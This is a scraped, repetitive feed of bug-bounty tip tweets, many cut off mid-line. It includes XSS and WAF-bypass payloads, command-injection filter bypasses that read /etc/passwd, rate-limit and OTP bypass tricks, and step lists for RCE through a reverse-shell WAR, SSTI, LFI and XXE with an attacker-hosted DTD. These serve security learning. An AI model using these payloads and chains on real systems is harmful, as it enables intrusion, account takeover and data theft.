RT @cry__pto: Tutorial on privilege escalation and post exploitation tactics
in Google Cloud Platform environments:(PDF) 66 PAGES:
[Link]
#PenTest #Hacking #bugbountytips #redteam
RT @ADITYASHENDE17: [Link] /plugins/servlet/oauth/users/icon-u

I always fuzz target name with my site name to gain SSRF AWS metadata.

Thanks to @D0rkerDevil SSRF write-up.

Remaining Google it
#bugbountytips #kongsec
RT @daoud_youssef: one line bash script to get every domain on specific IP
curl -s -k -X $'GET' -H $'Host: [Link] --url '[Link]
#bugbountytips #bugbountytip @rapiddns
RT @pdiscoveryio: #httpx v0.0.7 updates:-

☑Added TLS Probe (Subdomains from SSL)

☑Added Path/File Request support
☑Added Content-type fingerprinting
☑Added Matcher/Filters for Status Code/Length

[Link]

#hackwithautomation #bugbounty #security #bugbountytips [Link]

RT @mirhatx: Bash code for manuel subdomain takeover testing:

cat [Link] | xargs -n1 dig @[Link] | grep -A10 NXDO | grep CNAME

#BugBounty #bugbountytips #bugbountytip @hacktivist1337

RT @0x0Cj: Yay, My first writeup
I just published Bypassing OTP via reset password
#bugbountytips #bugbounty
[Link]
RT @safe_buffer: Wait !! Are you serious? are you going to help ppl to learn smt could re
RT @AldenAous: 🚀 CORS Protection RegEx Bypass 🚀 by:@trbughunters

#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://

RT @HusseiN98D: As per the vote results, here you go!
A cool XXE resulting from a SSRF found on local company website during a pentest. DMs
#bugbounty #bugbountytip #bugbountytips #infosec [Link]
How to Bypass The Rate limiting✌️✌️

Add this header in to the post request with an IP address.

X-Forwarded-For: (Any IP Address )

#bugbountytips #bugbounty #vulnerability #Hackers #exploit

RT @ITSecurityguard: Massive shoutout to [Link] for creating https:/

it is exactly what most of you people are looking for 😍

#recon #bugbountytips #BugBounty #AutomationAnywhere

RT @heald_ben: Easy way to find exposed production code:

1. Find a Gitlab hosted sub domain, usually named “[Link]” or “[Link]”

2. Even if login is required, try the

“/snippets” endpoint.

3. View internal source code snippets.

#bugbountytips #bugbounty #bugbountytip

RT @11xuxx: RCE on big company
1. subdomain enum
2. used "ffuf" and found tomcat on ";/..;/manager"
3. weak cred (used hydra)
4. "/manager/html" blocked, "/manager/text" was not
5. used "msfvenom" and crated reverse shell war
6. used "curl" and deployed the war file
7. rce!
#bugbountytips [Link]
RT @_Rutik_Sangle_: Finally today I completed the #100daystolearnandimprove challe
journey ahead.
Thanks to all
RT @HusseiN98D: An overview of what I did for my recent $10 000 bug. Always go for th
RT @roughwire: Running @pdnuclei on multiple template and don't want to see informat

cat [Link] | grep -v -e templateid1 -e templateid2

#bugbounty #bugbountytips
Running @pdnuclei on multiple template and don't want to see informative or low impac

cat [Link] | grep -v -e templateid1 -e templateid2

#bugbounty #bugbountytips
Subscribe to our Telegram Channel for Hackdoor Cyber Security Events and Webinars In
🤖🤖🔥🔥👾👾👇👇👇

[Link]

#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops

I just published How I was Able To bypass Cloudflare WAF [Link]
#bugbountytips @_abhichimbalkar @deep803937 @chevonphillip @dybtron
Sublist3r is a tool designed to enumerate subdomains of websites. It helps penetration t
[Link]
#cybersecurity #hackingtools #bugbountytips [Link]
RT @AmitMDubey: This little command will get all the Wayback endpoints to compare it

Tools -
waybackurls & unfurls by @TomNomNom
httpx by @pdiscoveryio

(I know it can be further optimized)

#bugbounty #bugbountytips #bugbountytips [Link]
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp [Link]
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp [Link]
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp [Link]
RT @11xuxx: XXE
1. change password func -> JSON
2. converted to XML -> 200 OK
3. created dtd file on my ec2 and started webserver on port 80
4. crafted a XXE payload!
5. bounty!

Always convert POST/PUT/PATCH body to xml and resend req, don't forget to change th
#bugbountytips [Link]
Two good articles about HTTP Request Smuggling.
[Link]://[Link]/trsGgcBCOg
[Link]://[Link]/BwoMkuigWi
#cybersecurity #bugbounty #bugbountytips
RT @pdnuclei: Here is a #tip for using nuclei for a given list of subdomains, Nuclei accep

#bugbountytips [Link]
RT @F3RR4R1_R3D: Why am i just now reading this? Anyways good recon methodology
RT @KomodoGT: I had some spaghetti last night this is what I found this morning. #bug
I had some spaghetti last night this is what I found this morning. #bugbountytips https:
RT @rnd_infosec_guy: #bugbountytip

Don’t propagate bug bounty as a reasonable job model. It is the same as saying everyon

#bugbountytips #infosec #BugBounty

RT @ssh0x00r: does we need to know JavaScript to get started in bug bounty ?

#bugbountytips #hacking #infosec #hackerone

does we need to know JavaScript to get started in bug bounty ?

#bugbountytips #hacking #infosec #hackerone

RT @chiraggupta8769: Awesome Tip By @intigriti And Tool By @sratarun #bugbountytip
RT @_YashGoti_: Need to automate your recon process with telegram chat here you go.

#bugbountytips
#recon
#automate

[Link]
RT @krizzsk: A small but effective way to recon and get internal subdomains to increase
Why am i just now reading this? Anyways good recon methodology and nice #bugbount
RT @dynamicCISO: With @HarshBothra_, we have delivered a great session on #Offensi

Video: [Link]

Slides: [Link]
@rneelmani @hacback17 #infosec #bugbountytips #bugbounty #girlswhocode #Linux
RT @HackerOn2Wheels: Bypass I learned from @rene_kroka this week:
[Link]

onpointerrawupdate= " A='',B=!A+A,C=!B+A,D=A+{},E=B[A++],F=B[G=A],H=++G+A,

👆 = alert(1)

#bugbounty #bugbountytips
RT @Ranger_one_: Great Resource for Template Injection!

[Link]

[Link]

[Link]

#bugbountytip #bugbountytips #bugbounty

#bugbountytips
webarchive > found email change unconfirmed link > checked source > found e

at this point i cannot change the mail of he user as it won't be good for the user

reported

#bugbounty #security
RT @Faeeqjalali: OTP bypass .
Checked the respone with entering wrong OTP.
Changed status from "invalid otp " to
"Valid otp".
BOOM.... P3
#bugbountytips
#bugbounty
#infosec
OTP bypass .
Checked the respone with entering wrong OTP.
Changed status from "invalid otp " to
"Valid otp".
BOOM.... P3
#bugbountytips
#bugbounty
#infosec
RT @hsakarp_ilajna: Things you should Gather: #Osint :

metadata
organization’s employees
Phone numbers
Open hours and holidays
Key employees
job offers
Partner companies
News 
which CMS the target is using.
Hidden directories
Leaked Info
open ports
software version

##bugbountytips   #bugbounty

🧮 ️Top 25 Local File Inclusion (LFI) Parameters ️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

⛓️Get Reflected XSS within 3 minutes ⛓️by:@gkhck_

[Link]

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip

RT @ja1sharma: Bash Script to scrap spring applications via Shodan and enumerating se
Usage: ./[Link] <redact>
Output: <redact-Spring_FFUF.txt>
>:[Link]
Any suggestions are welcome.

Credit: @K4r1it0 @Madrobot_

#bugbounty #bugbountytips [Link]
It was a fantastic session loaded with lots of live examples. Thank you so much, @harsh

Video: [Link]

Slides: [Link]

#bugbounty #bugbountytips #security #infosec #ciso #hacker #girlswhocode #linux #

RT @Virdoex_hunter: Bug bounty fast hunting find all subdomains using all tools and the
It was great to have a talk with @dynamicCISO. In case if you missed, find my slides &a

Slides: [Link]

Stream: [Link]

Thanks, @hacback17 for carrying this out.

#bugbountytips #bugbounty #websecurity #hacking #recon #bugcrowd

With @HarshBothra_, we have delivered a great session on #Offensive #Recon. The aud

Video: [Link]

Slides: [Link]
@rneelmani @hacback17 #infosec #bugbountytips #bugbounty #girlswhocode #Linux
RT @_ayoubfathi_: Ran into an API subdomain with an empty response?

You may get lucky and fetch the full API spec by hitting the following endpoints:

/[Link]
/swagger/[Link]
/api/[Link]
/v1.x/[Link]
/swagger/[Link]
...

#bugbountytips #bugbounty #hackerone

RT @chiraggupta8769: Top 25 Remote Code Execution (RCE) Parameters by @trbughunt

#bugbountytips #bugbountytip #bugbounty [Link]

RT @harshbothra_: Easily find exposed secrets from Github and Identify manually if they

#bugbountytip #bugbountytips #bugbounty #security [Link]

Account Takeover tips 👀👍🏻
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty [Link]
RT @th3hokag3: BUG BOUNTY TIP:

#bugbountytips #bugbounty #bugbountytip #cybersecurity #infosec [Link]

RT @cyanpiny: #bugbountytips [Link]
#bugbountytips [Link]
CloudFlare Origin Certificate

How to find out the real server IP hidden behind the Cloudflare CDN

[Link].common_name: CloudFlare Origin Certificate

#bugbountytips #bugbounty
RT @SalahHasoneh1: ️Manipulation of email by Latin letters ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

Bash Script to scrap spring applications via Shodan and enumerating sensitive endpoints
Usage: ./[Link] <redact>
Output: <redact-Spring_FFUF.txt>
>:[Link]
Any suggestions are welcome.

Credit: @K4r1it0 @Madrobot_

#bugbounty #bugbountytips [Link]
What I consider the top two learning and testing books for #pentesting and #bugbounty

#cybersecurity #bugbountytips #penetrationtesting

[Link]
RT @AldenAous: Second medium blog-post:

Stealing your Paytm information using XSS by: @VirenPawar_

[Link]

#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring

🚀💡 XSS from another level 💡🚀
[Link]

#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec

RT @ehsayaan: If you found some api key or secret key then these are some tips to Esca

#BugBounty #bugbountytips [Link]

RT @pwn0sec: [Link]

#bugbounty #bugbountytips #vulnerabilityanalysis #Flutter

[Link]

#bugbounty #bugbountytips #vulnerabilityanalysis #Flutter

Great Resource for Template Injection!

[Link]

[Link]

[Link]

#bugbountytip #bugbountytips #bugbounty

RT @chiraggupta8769: A small Burpsuite trick which helped @amitmdubey to find Blind

Step 1: Use Intruder to Bruteforce Headers

Step 2: Add Burp collaborator URL as value
Step 3: Add prefix numerical payload (Pitchfork)
Step 4: Use Tarborator Extension to monitor hit

#bugbounty #bugbountytips [Link]

RT @faizalabroni: 1. ./[Link] -u target -e php,html,js,xml -x 500,403
2. found [Link]
3. clone & use [Link]
4. ./[Link] --url [Link] --match [Link]
5. result in output dir and just open it
#bugbounty #bugbountytips [Link]
RT @terjanq: I recently discovered a fancy way to execute arbitrary XSS without parenth

[Link]

#javascript #bugbountytips #xss [Link]

RT @r00t98: Bypass rate limit to account takeover

1. Server limited brute force OTP by ip.

2. Install & config ip rotate(burp suite extender).
3. Send password reset code.
4. Brute force OTP with intruder.
5. Change password.

#bugbountytip #bugbountytips
RT @bountyhunter_fr: Here is a way to escape a restricted shell in linux
#bugbountytips

What would you have done to escape a restricted shell? [Link]

comments in the source code
google hacking
Wayback Machine
IPs
shodan
Censys
Whois
Similar Domains
#Searching Social Media
VPN provider
#S3 Bucket Enumeration
#Emails
#GITHUB recon
#Subdomains

#bugbountytips   #bugbounty
#infosec #bugbountytip
#osnit_tool #cybersecurity
Things you should Gather: #Osint :

metadata
organization’s employees
Phone numbers
Open hours and holidays
Key employees
job offers
Partner companies
News 
which CMS the target is using.
Hidden directories
Leaked Info
open ports
software version

##bugbountytips   #bugbounty

⏰Reflected XSS on Sony with Google Dork & Akamai WAF Bypass ⏰
[Link]

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip

🚀 CORS Protection RegEx Bypass 🚀 by:@trbughunters

#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://

RT @hsakarp_ilajna: My #twitter and #linkedin feed is flooded with Bug Bounty tips Tw
#bugbountytips #cybersecurity #LinkedIn #bounty #hacking #bugs #vulnerabilities #b
RT @BugBountyRecon: What should you look for when attacking OAuth2?

A nice overview: [Link]

#bugbountytips #BugBounty
RT @arkadiyt: I've added Intigriti and YesWeHack support to my bounty-targets-data cr

Happy hunting: [Link] #bugbounty #bugbountytips

RT @AldenAous: ️Ways to bypass rate limit ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

RT @iambeingjoker: #JSON #Web #Tokens | Authenticating #single page #apps using #
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @trbughunters: ️Top 25 Remote Code Execution (RCE) Parameters ️
️️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | #follow Java
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @iambeingjoker: #JSON #Web #Tokens | Authenticating #single page #apps using #
#javascript #hacking #USDT #Bitcoin #coding #bugbountytips #bughunting #tipsandtr
RT @m4ll0k2: [Link] - Simple Python tool for find a unique words in
#bugbountytips [Link]
RT @taaminz: Access to internal company info
1. Find an internal dev domain using [Link]
2. Subdomain enumeration on internal domain
3. Find internal API subdomain
4. API key and endpoint in javascript file
5. Access to internal info
#bugbountytips #bugbounty
RT @pdnuclei: #oneliner

✅ Subdomain enumeration
✅ Full port scan
✅ HTTP web server detection

#security #bugbountytips #portscan #subdomain #chaos [Link]

My #twitter and #linkedin feed is flooded with Bug Bounty tips Tweets. I am really fee
#bugbountytips #cybersecurity #LinkedIn #bounty #hacking #bugs #vulnerabilities #b
RT @chickflow0: when your report is duplicated and closed as N/A!
@Hacker0x01 - keep hunting!...

#hackerone #togetherwehitharder #bugbounty #bugbountytips #vulnerabilityanalysis #

RT @BeingjokerMeme: JSON Web Tokens | Authenticating single page apps using JWT |
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
when your report is duplicated and closed as N/A!
@Hacker0x01 - keep hunting!...

#hackerone #togetherwehitharder #bugbounty #bugbountytips #vulnerabilityanalysis #

RT @GainSec: How Install CloudGoat on Ubuntu Server
-
-
🤓 Follow @gainsec
-
[Link]
-
#Hacking #ethicalhacker #bugbountytips #infosec #pentesting #pentester #cybersecu
How Install CloudGoat on Ubuntu Server
-
-
🤓 Follow @gainsec
-
[Link]
-
#Hacking #ethicalhacker #bugbountytips #infosec #pentesting #pentester #cybersecu
How to Answer tricky Javascript Interview Questions | #follow Javascript [Link]
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @MeetAn0nym0us: Just published an Article on Android Apps Pen-testing.
Don't forget to share your thoughts on it.
Thanks!
[Link]
#BugBounty #bugbountytips #TogetherWeHitHarder #hackerone #ItTakesCrowd https:
RT @naglinagli: Google dork for CVE-2020-3452
'inurl:[Link] "CSCOE"'
(It will find exposed Cisco SSL-VPN domains, not 100% of them are vulnerable, but mos
After reaching a login page, try one of @aboul3la POC's
#bugbountytips [Link]
#JSON #Web #Tokens | Authenticating #single page #apps using #JWT [Link]
#javascript #hacking #USDT #Bitcoin #coding #bugbountytips #bughunting #tipsandtr
#JSON #Web #Tokens | Authenticating #single page #apps using #JWT [Link]
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @black_hat_india: Disclosing user's sensitive information like phone number, tokens

Captured login request via BURP.

/hub/v1/user/otp/login?email=attacker@[Link]
/hub/v1/user/otp/login?email=victim123@[Link]
/hub/v1/user/otp/login?email=victim456@[Link]

#bugbountytips #infosec
RT @black_hat_india: LFI to RCE
1. ffuf on "/" -> "redacted-api" -> 302
2. ffuf on "redacted-api/" -> "[Link]" -> 200
3. all operations were auth protected
4. didn't give up and tested ~200 operations
5. fount LFI, no auth
6. admin creds in plaintext, logged in and got RCE
#bugbountytips [Link]
RT @dwisiswant0: FinDOM-XSS - Find for Possible DOM Based XSS Vulnerability
[Link]

Inspired by @dark_warlord14 by JSScanner tool, and @aslanewre with the possible patt

#bugbounty #bugbountytips #infosec [Link]

RT @11xuxx: Twig SSTI
1. Submitted {{7*7}} and received "you password is: 49"
2. Tried "registerUndefinedFilterCallback" func, it was blocked by Imperva WAF https://
3. read Twig source code and found "registerUndefinedFunctionCallback"
4. WAF bypassed and RCE!
#bugbountytips [Link]
RT @black_hat_india: subfinder -nW -silent -t 25 -d $DOMAIN | shuffledns -silent -d $DO

Some crazy oneliners possible for subdomain discovery

#bugbountytips
RT @Yumi_Sec: An interesting trick: you can bypass a WAF during a XSS attack on ASP(d

#BugBounty #BugBountyTips #InfoSec

(Credit to Acunetix)
Full article: [Link] [Link]
RT @iambeingjoker: JSON Web Tokens | Authenticating single page apps using JWT | Ho
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @pwn0sec: Pwned @andripwn - Bypassing WAF XSS with language

/></noscript></form><script language="javascript">[Link](1

#xss #bypasswaf #bugbountytips #bugbountytip #penetrationtesting [Link]

RT @andripwn: Bypassing WAF XSS with language

/></noscript></form><script language="javascript">[Link](1

#xss #bypasswaf #bugbountytips

RT @andripwn: Waf Bypassing SQL-Injections DIOS
Leads to Recon Find Cpanel Login

#bugbountytips #bypassWaf #hackerone [Link]

JSON Web Tokens | Authenticating single page apps using JWT | How to use [Link]
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
JSON Web Tokens | Authenticating single page apps using JWT | How to use [Link]
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @Hxzeroone: #Bugbountytips
If you’re testing a website which lets you use your account on Xbox/Setup [Link] hxxp
[Link]
RT @trbughunters: ️Top 25 SQL Injection Parameters for @trbughunters ️
️️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

RT @trbughunters: ‍‍☠Top
‍ ️ 25 Server-Side Request Forgery (SSRF) Dorks ‍
‍☠️

Note: The popularity of dorks can vary.

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

RT @andripwn: Bug Bounty GitLab : Stored XSS in Wiki pages
Status : Patched
Writeup's here::
[Link]

#bugbounty #bugbountytips #hackerone #gitlab

RT @xalerafera: If you find the host hosting the WordPress CMS, then try to see, if xmlrp

Then, through the PingBack function, you can get Blind SSRF)

#bugbounty #hackerone #bugbountytip #bugbountytips [Link]

RT @bendtheory: just learned about ffuf’s response size filter -fs

super useful when a site returns 200 for bad paths instead of 404’s. you can even set a r

friendship ended with dirbuster

now ffuf is my best friend

#bugbountytips
RT @jdksec: Need a quick way to request 1000's of URLs in burp without crashing your b

cat [Link]| parallel -j 10 curl --proxy [Link] -sk > /dev/null

#bugbounty #bugbountytips #bugbountytip [Link]

RT @Th3G3nt3lman: P1 of the day on @Bugcrowd :
1- [Link] =>403 forbidden
2- [Link] =>Redirect to corporate SSO
3- [Link] =>IP:8005 and Api_key
4- [Link] => [Link]
5- Use key in swagger=> Info Disclosure

#bugbountytips
RT @IfrahIman_: Want to find some new subdomains for your target?
Use SecurityTrails API 🔥 to enumerate.

#bugbountytips [Link]
RT @bendtheory: XSSI example PoC to fix JS undefined/type errors

<script>
x = function(y, z) { };
prof = {'manager': {'load':null, 'fn':x}}
[Link] = function (leaked) {
alert([Link](leaked));
};
</script>
<script src="[Link]

#bugbountytips

RT @bendtheory: #xss payload for when

1. a parameter is reflected in javascript

2. it’s being inserted into the DOM via innerHTML
3. HTML encoding and not Javascript encoding is used
4. WAF blocks common payloads

\x3Ctextarea+onauxclick\x3Dconfirm(1)\x3Eright+click+here

#bugbountytips
RT @laud3b: Finding for API keys, Tokens and Passwords with Github Dorks
#bugbounty #bugbountytips [Link]
RT @mase289: I just published The $1,000 worth cookie
A story of DOM XSS in [Link]
[Link]

#BugBounty #bugbountytips #xss

RT @AldenAous: - SQL'injection with WAF ByPass

If you find the host IP address of the target. You can remove the WAF by sending a requ
If the host accepts requests directly.
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty [Link]
RT @chiraggupta8769: Account Takeover By JWT Token Forging By @_mkahmad

#bugbountytips #bugbounty [Link]

RT @trbughunters: ⛓️Get Reflected XSS within 3 minutes ⛓️

@gkhck_ from our community, wrote a write-up about the xss recon methodology!

[Link]

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip

RT @praseudo: Want to know which web files on a website are cached? Here is an online

[Link]

#bugbounty #bugbountytips #hacking #Recon #recontips #bugbountytools [Link]

RT @niravsikotaria: Dear @pdiscoveryio 😍

Thanks for "httpx" tool works like Jet Plane🚀

#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips #httpx

RT @m4ll0k2: Simple tool for get domain relationship.. [Link] - @Jha
RT @harshbothra_: Simple Oneliner to Filter out Domains with "200 Status" and further

cat [Link] | httpx -follow-redirects -status-code -vhost -threads 100 | sort -u | gre

#bugbountytips #bugbounty #security #infosec

RT @harshbothra_: Found an API Key/Secret/Token - Not Sure whether to report it or n

@udit_thakkur Thanks for a good tool ;)

#bugbounty #bugbountytip #bugbountytips [Link]
RT @gwendallecoguic: #onliner to extract endpoints from JS files of a given host #BugB
Regexp dependant so highly improvable!
[Link] [Link]
RT @11xuxx: LFI to RCE
1. ffuf on "/" -> "redacted-api" -> 302
2. ffuf on "redacted-api/" -> "[Link]" -> 200
3. all operations were auth protected
4. didn't give up and tested ~200 operations
5. fount LFI, no auth
6. admin creds in plaintext, logged in and got RCE
#bugbountytips [Link]
RT @pdnuclei: Here is how you can use #httpx to import a list of

a) URLs
b) Subdomains
c) Endpoints

to Burp suite for further crawling or scanning.

#bugbountytips #pentest #security #hackwithautomation #burpsuite [Link]

RT @AbhishekKarle3: I just published How I was able to change victim’s password using

Thanks to @musiclouderlml for sharing #bugbountytips

RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @Tismayil1: Imperva Waf XSS ByPass :

Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9

Codepen : [Link]

#BugBounty #BugBountyTip #BugBountyTips #WhiteHats [Link]

RT @Random_Robbie: <?php var_dump(explode(',',ini_get('disable_functions'))); ?&g

Handy as hell tip for checking which functions you need to by pass on PHP RCE.

#bugbountytips #bugbountytip
RT @hacktory1: 6 steps and 2 tools to attack JSON Web Token
[Link]
[Link]

#hacktory_tools #bugbounty #cybersecurity #bugbountytip #bugbountytips #cybersec

How to Answer tricky Javascript Interview Questions | Weird Javascript | [Link]
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @chiraggupta8769: one-liner to extract endpoints from JavaScript files by @renniepa

cat [Link] | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s

#bugbountytips #bugbountytip #bugbounty [Link]

RT @SalahHasoneh1: ️Way to bypass 2FA ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht

RT @vNature0: Could you please recommend tools/scripts to test for known vulnerabilit

My website has been receiving some attempts of doing random stuff from Russia so I wa

Thanks!!

#bugbountytips #bugbountytip
Could you please recommend tools/scripts to test for known vulnerabilities?

My website has been receiving some attempts of doing random stuff from Russia so I wa

Thanks!!

#bugbountytips #bugbountytip
RT @roughwire: Duplicates specially RCE on bugbounty program makes you feel hell.
#bugbountytips never check your hackerone notification before going to bed specially w
RT @dark_warlord14: New write up around ffuf to help you speed up few things during p
Blog: [Link]
I hope it helps you in someway. Retweet if you like. Happy Hacking!!
#bugbounty
#bugbountytips [Link]
RT @MrrFawadkhann: Eid Mubarak to everyone

#bugbountytips #BugBounty
Eid Mubarak to everyone

#bugbountytips #BugBounty
RT @Tismayil1: Yes I awarded 5000$ in Private Program.
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty
- SQL'injection with WAF ByPass

If you find the host IP address of the target. You can remove the WAF by sending a requ
If the host accepts requests directly. [Link]
RT @11xuxx: Using ffuf the right way and gaining admin access
1. "ffuf -u ... --mc all" -> match all response codes
2. ctrl+c after 5 sec
3. "ffuf -u ... --mc all -fw ..."
4. found a backdoor developer used to login as admin (response code 404)

all credits goes to @joohoi

#bugbountytips [Link]
Wait !! Are you serious? are you going to help ppl to learn smt could really make an impa
Once I realized the trick to @adamtlangley's "I once was blind but now I RFC" challenge

TIL @PortSwigger's Burp Collab does SMTP!

This is insaaanely useful.

#bugbounty #bugbountytips [Link]

RT @shreyasrx: Command injection 💥
Filter Bypasses >

1/3

cat /etc/passwd
cat /e"t"c/pa"s"swd
cat /'e'tc/pa's' swd
cat /etc/pa??wd
cat /etc/pa*wd
cat /et' 'c/passw' 'd
cat /et$()c/pa$()$swd

#bugbountytips
#shieldindia
#commandinjection
RT @abhishake100: I just published "Bug Bounty in Lockdown (SQLi and Business Logic
#bugbounty #bugbountytips
[Link]
RT @CristiVlad25: Tools for #bugbounty hunters. With @InsiderPhD

#bugbountytips #bughunting #ethicalhacking

[Link]
Tools for #bugbounty hunters. With @InsiderPhD

#bugbountytips #bughunting #ethicalhacking

[Link]
RT @D0rkerDevil: Escalated a blind python code injection to
rce , Thanks to @imhaxormad for the help.
another #DNS_BASED_EXFILTRATION
just decode the output from base64
and you will get

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/

#bugbounty #dnsexfil #bugbountytips [Link]

RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #

Top 25 Remote Code Execution (RCE) Parameters

#bugbountytips #bugbountytip #bugbounty [Link] [Link]

️️Ways to bypass rate limit ️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

- SQL'injection with WAF ByPass

If you find the host IP address of the target. You can remove the WAF by sending a requ
If the host accepts requests directly.
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty [Link]
RT @sh0mbo: Need to trigger that xss payload, but parens are filtered? EZ!

Function`return alert````${[Link]}`

#xss #payload #filterevasion #bugbountytips #bugbounty

RT @joeldeleep: A good way to run linkfinder if you have a list of js files #infosec #bugb
RT @Tismayil1: Yes I earned $3180.

Tools :

Sub Scanner : [Link]

Dir Scanner : [Link]
Git Dumper : [Link]

#BugBounty
#bugbountytips
#bugbountytip
#whitehat
#infosec [Link]

RT @Tismayil1: I Earned $XXXX OS Command Injection Private Program.

Used Repos

1 : Dir Searcher : [Link]

2 : Sub Scanner : [Link]

#BugBounty
#bugbountytips
#bugbountytip
#whitehat [Link]

RT @_0nk4r_: Subdomain Takeover 101 ..@EdOverflow Great Blog

learn a lot
[Link]
----
#togatherwelearn #bugbountytips
How to Answer tricky Javascript Interview Questions | Weird Javascript |... [Link]

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #

Duplicates specially RCE on bugbounty program makes you feel hell.
#bugbountytips never check your hackerone notification before going to bed specially w
Here is a way to escape a restricted shell in linux
#bugbountytips

What would you have done to escape a restricted shell? [Link]

How to Answer tricky Javascript Interview Questions | Weird Javascript |... [Link]

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #

#programfolback #tutorial #code #opensource
RT @SatyamGothi: #bugbountytips for sure💯
A M A Z I N G #bugbountytips #bugbountytip #infosec [Link]
#bugbountytips for sure💯
RT @d3tonator: Rate limit bypass:
Add header/s with request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP

If bypass successful, & after a while blocking request again. Increment the last oct
#infosec #bugbountytips

RT @d3tonator: Easy Money | P3 MAP API | Android

1. Open the apk in Jadx-gui
2. Go to [Link] > res > values > [Link]
3. Here you'll find the Google Map API Key
4. Open the URL [Link]
Map open then report it
#BugBountytips #Android #bugbounty #infosec
Wanna know the best way to be demotivated in the bug bounty field?

Compare yourself with others!

#bugbounty #bugbountytips
RT @InonShkedy: A series of articles I wrote about major changes in app development (

1: Modern vs. Traditional apps:

[Link]

2: What is Modern AppSec:

[Link]

#bugbountytips
RT @farah_hawa01: NEW VIDEO: In this video, I tak about SAML authentication, SSO’s,

[Link] [Link]
RT @BeingjokerMeme: How to Answer tricky Javascript Interview Questions | Weird Jav

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks

RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #

How to Answer tricky Javascript Interview Questions | Weird Javascript |... [Link]

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #

How to Answer tricky Javascript Interview Questions | Weird Javascript |... [Link]

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks

RT @s3rgiomazari3go: Some of the resources most of the professional people recommen
[Link]://[Link]/SveHxbs2Nr
[Link]://[Link]/I8colHHkwB
[Link]://[Link]/eMCUzhjaqf
#bugbountytips
RT @VirenPawar_: Second medium blog-post:

Stealing your Paytm information using XSS

[Link]

#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring

RT @amad3u6: You can specify memory size for @Burp_Suite to make it more smoother

~$ java -jar -Xmx3072M /path/to/[Link]

or

~$ java -jar -Xmx3G /path/to/[Link]

#bugbountytips #bugbountytip #bugbounty #infosec

RT @HossamSec: To test XSS + SQLi + SSTI/CSTI with the same payload use :

'"><svg/onload=prompt(5);>{{7*7}}

' ==> for Sql injection

"><svg/onload=prompt(5);> ==> for XSS

{{7*7}} ==> for SSTI/CSTI

#bugbounty #infosec #TogetherWeHitHarder #bugbountyprotip #Pentesting #bugboun
RT @ajdumanhug: I'll tag #BugBountyTips to notify #SecurityResearchers. Go check out
I'll tag #BugBountyTips to notify #SecurityResearchers. Go check out these platforms an
RT @SalahHasoneh1: ️Extract endpoints from APK files ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

#bugbountytips #BugBounty [Link]
[Link] MR [Link] >>> #blockchain #opensource #linux #
Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot

#bugbountytips #BugBounty #bugbountytip [Link] [Link]

Bug bounty fast hunting find all subdomains using all tools and then use all endpoint gra
RT @HackerOn2Wheels: Content Type Forcing - The XSS you may have missed.

